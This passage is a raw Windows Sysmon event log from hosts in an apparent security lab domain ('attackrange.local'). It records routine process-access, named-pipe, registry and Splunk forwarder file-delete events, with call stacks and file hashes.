12:24:43.072{42DC5269-CE99-6086-1500-00000000BA01}12006856C:\Windows\system32\svchost.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440714Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.068{42DC5269-CE99-6086-1500-00000000BA01}12006856C:\Windows\system32\svchost.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+4689|c:\windows\system32\themeservice.dll+3fdd|c:\windows\system32\themeservice.dll+3c53|c:\windows\system32\themeservice.dll+2675|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440713Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.068{42DC5269-CE99-6086-1500-00000000BA01}12001256C:\Windows\system32\svchost.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440712Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.067{42DC5269-CE99-6086-1500-00000000BA01}12006856C:\Windows\system32\svchost.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x147aC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\themeservice.dll+3de3|c:\windows\system32\themeservice.dll+26c0|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440711Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.067{42DC5269-CE99-6086-1500-00000000BA01}12001256C:\Windows\system32\svchost.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292156Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.125{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292155Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.125{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292154Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.125{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292153Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.125{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292152Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.125{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292151Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.125{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292150Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.125{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292149Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.125{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x8000000000000000292148Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-ConnectPipe2021-04-27 12:24:43.109{BEA10069-D0C2-6086-0F00-00000000BB01}936\TSVCPIPE-e0582208-0b1b-4d6e-9177-8dab2eb6ce38C:\Windows\System32\svchost.exe 17141700x8000000000000000292147Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-CreatePipe2021-04-27 12:24:43.109{BEA10069-D0C2-6086-0F00-00000000BB01}936\TSVCPIPE-e0582208-0b1b-4d6e-9177-8dab2eb6ce38C:\Windows\System32\svchost.exe 10341000x8000000000000000292146Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.109{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-0F00-00000000BB01}936C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+b4ff|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000292145Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.109{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292144Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.109{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292143Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.109{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292142Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.040{BEA10069-D4AB-6086-4301-00000000BB01}33843340C:\Windows\system32\csrss.exe{BEA10069-D0C2-6086-0C00-00000000BB01}728C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\winsrv.DLL+7de7|C:\Windows\system32\winsrv.DLL+17e9|C:\Windows\system32\winsrv.DLL+1579|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000292141Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.040{BEA10069-D4AB-6086-4301-00000000BB01}33843340C:\Windows\system32\csrss.exe{BEA10069-D0C2-6086-0F00-00000000BB01}936C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\winsrv.DLL+1ef0|C:\Windows\system32\winsrv.DLL+17e9|C:\Windows\system32\winsrv.DLL+1579|C:\Windows\SYSTEM32\ntdll.dll+5178f 13241300x8000000000000000292140Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-SetValue2021-04-27 12:24:43.040{BEA10069-D0B7-6086-0100-00000000BB01}4SystemHKLM\System\CurrentControlSet\Services\mouclass\Enum\NextInstanceDWORD (0x00000002) 13241300x8000000000000000292139Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-SetValue2021-04-27 12:24:43.040{BEA10069-D0B7-6086-0100-00000000BB01}4SystemHKLM\System\CurrentControlSet\Services\mouclass\Enum\CountDWORD (0x00000002) 13241300x8000000000000000292138Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-SetValue2021-04-27 12:24:43.040{BEA10069-D0B7-6086-0100-00000000BB01}4SystemHKLM\System\CurrentControlSet\Services\mouclass\Enum\1TERMINPUT_BUS\UMB\2&2c22bcc9&0&Session2Mouse0 13241300x8000000000000000292137Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-SetValue2021-04-27 12:24:43.040{BEA10069-D0B7-6086-0100-00000000BB01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\NextInstanceDWORD (0x00000002) 13241300x8000000000000000292136Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-SetValue2021-04-27 12:24:43.040{BEA10069-D0B7-6086-0100-00000000BB01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\CountDWORD (0x00000002) 13241300x8000000000000000292135Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-SetValue2021-04-27 12:24:43.040{BEA10069-D0B7-6086-0100-00000000BB01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\1TERMINPUT_BUS\UMB\2&2c22bcc9&0&Session2Mouse0 13241300x8000000000000000292134Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-SetValue2021-04-27 12:24:43.040{BEA10069-D0B7-6086-0100-00000000BB01}4SystemHKLM\System\CurrentControlSet\Services\kbdclass\Enum\NextInstanceDWORD (0x00000002) 13241300x8000000000000000292133Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-SetValue2021-04-27 12:24:43.040{BEA10069-D0B7-6086-0100-00000000BB01}4SystemHKLM\System\CurrentControlSet\Services\kbdclass\Enum\CountDWORD (0x00000002) 13241300x8000000000000000292132Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-SetValue2021-04-27 12:24:43.040{BEA10069-D0B7-6086-0100-00000000BB01}4SystemHKLM\System\CurrentControlSet\Services\kbdclass\Enum\1TERMINPUT_BUS\UMB\2&2c22bcc9&0&Session2Keyboard0 13241300x8000000000000000292131Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-SetValue2021-04-27 12:24:43.040{BEA10069-D0B7-6086-0100-00000000BB01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\NextInstanceDWORD (0x00000001) 13241300x8000000000000000292130Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-SetValue2021-04-27 12:24:43.040{BEA10069-D0B7-6086-0100-00000000BB01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\CountDWORD (0x00000001) 13241300x8000000000000000292129Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-SetValue2021-04-27 12:24:43.040{BEA10069-D0B7-6086-0100-00000000BB01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\0TERMINPUT_BUS\UMB\2&2c22bcc9&0&Session2Keyboard0 23542300x8000000000000000292128Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.040{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=BDC3A3E5BB7F33C116609FA72F0E28E7,SHA256=AE5BC1DFFF119DD27186B1215A6929BB40171C7C8047700D54901C00800EF6CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292127Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.025{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=B7CCB92A2FA56AE1769ABC02C3EEA89D,SHA256=E8F4491896B627F771AF756F2557DA9E0A6D6392CD87D951E3D8FBAE0AEA217E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292126Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.025{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=B7CCB92A2FA56AE1769ABC02C3EEA89D,SHA256=E8F4491896B627F771AF756F2557DA9E0A6D6392CD87D951E3D8FBAE0AEA217E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292125Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.025{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=E51AD5D82698DC3FEE746BB0F7026F32,SHA256=09787D27DCEDA6BF4E0B0EE0264A840D1803A0AD781CEB6E8890F32300F01903,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292124Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.025{BEA10069-D4AF-6086-5601-00000000BB01}436WIN-HOST-96\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpgMD5=F33442D9BB8F8BFDBE2C8315132603B2,SHA256=399816D8F71681E02B635293583D0D74EC6DD6017C1BBC70E865A7558050A09C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292123Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.025{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE010B6F28E810BAFF26E5523D8E863F,SHA256=4163CF09E0F2BC9857689636DD8F6C9946F12651981E2E71209C6C860B642D69,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292122Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.009{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D4AB-6086-4401-00000000BB01}3848C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292121Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.009{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D4AB-6086-4401-00000000BB01}3848C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292120Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 